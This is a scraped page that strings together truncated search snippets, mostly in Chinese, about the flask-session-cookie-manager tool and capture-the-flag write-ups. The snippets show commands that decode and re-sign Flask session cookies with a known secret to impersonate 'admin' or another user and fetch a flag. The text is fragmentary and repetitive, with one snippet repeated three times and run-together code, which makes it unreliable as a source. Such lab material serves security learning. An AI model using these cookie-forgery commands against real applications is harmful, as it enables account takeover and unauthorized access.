:cookie: Flask Session Cookie Decoder/Encoder. Contribute to noraj/flask-session-cookie-manager development by creating an account on GitHub.
工具使用 广大研究人员可以根据自己配置的Python环境来调用不同版本的脚本,即Python3对应flask_session_cookie_manager3.py,Python2环境对应flask_session_cookie_manager2.py: usage: flask_session_cookie_manager{2,3}.py [-h] {encode,decode} ... Flask Session Cookie Decoder/Encoder positional arguments: {...
首先先对当前的session进行解密,查看session的格式 python3 flask_session_cookie_manager3.py decode -c'eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.Y48pCw.jSI45FJchx1e5pmIMuxPxvo4m9E'-s'210.13041538' 上面要求username=fuck 将www-data改为fuck进行伪造 修改session ,访问/flag得到flag [HCTF 20...
-- xxxxx.save_session 将session加密给cookie -- Flask-session通过修改session_interface指定的类 -- 来改变session存储的位置 2、使用步骤 1. 下载 pip install flask-session2. 导入fromflask-sessionimportSession 到__init__的app实例里面3. 更改配置文件classDevConfig(object): DEBUG=True SESSION_TYPE="redi...
FLASK加密脚本 GITHUB给你爱: https://github.com/noraj/flask-session-cookie-manager 解题过程 首先打开网站,看到your name is none???猜想可以构造name参数 确实可以,想起HCTF一道题,会不会是SSTI??? 果然是这样的 以为是模板注入题目,百度尝试了很多都没有成功 ...
工具伪造session: $ python3 flask_session_cookie_manager3.py encode -s 'hello world' -t '{"user":"admin"}' eyJ1c2VyIjoiYWRtaW4ifQ.Xzqkag.jq8cULYNeQYVZiH-2Fe3cAfECk4 替换后: ssti 老生常谈的问题,一直没总结,稍微写写。 先前对于ssti的理解不是很清晰,只会解一些稍简单的ssti,前段时间...
python flask_session_cookie_manager3.py decode-s"ican"-c"eyJ1c2VybmFtZSI6IjEifQ.Y7bNzg.k_DFbUcMkBDAZwZuKR2gvFuiQhc" 得到数据为{'username':'1'},猜测这里应该是想让我们修改为admin,因此修改1为admin,而后进行加密 代码语言:javascript ...
工具伪造session: $ python3 flask_session_cookie_manager3.py encode -s 'hello world' -t '{"user":"admin"}' eyJ1c2VyIjoiYWRtaW4ifQ.Xzqkag.jq8cULYNeQYVZiH-2Fe3cAfECk4 替换后: ssti 老生常谈的问题,一直没总结,稍微写写。 先前对于ssti的理解不是很清晰,只会解一些稍简单的ssti,前段时间...
工具伪造session: $ python3 flask_session_cookie_manager3.py encode -s 'hello world' -t '{"user":"admin"}'eyJ1c2VyIjoiYWRtaW4ifQ.Xzqkag.jq8cULYNeQYVZiH-2Fe3cAfECk4 1. 替换后: ssti 老生常谈的问题,一直没总结,稍微写写。
:cookie: Flask Session Cookie Decoder/Encoder. Contribute to noraj/flask-session-cookie-manager development by creating an account on GitHub.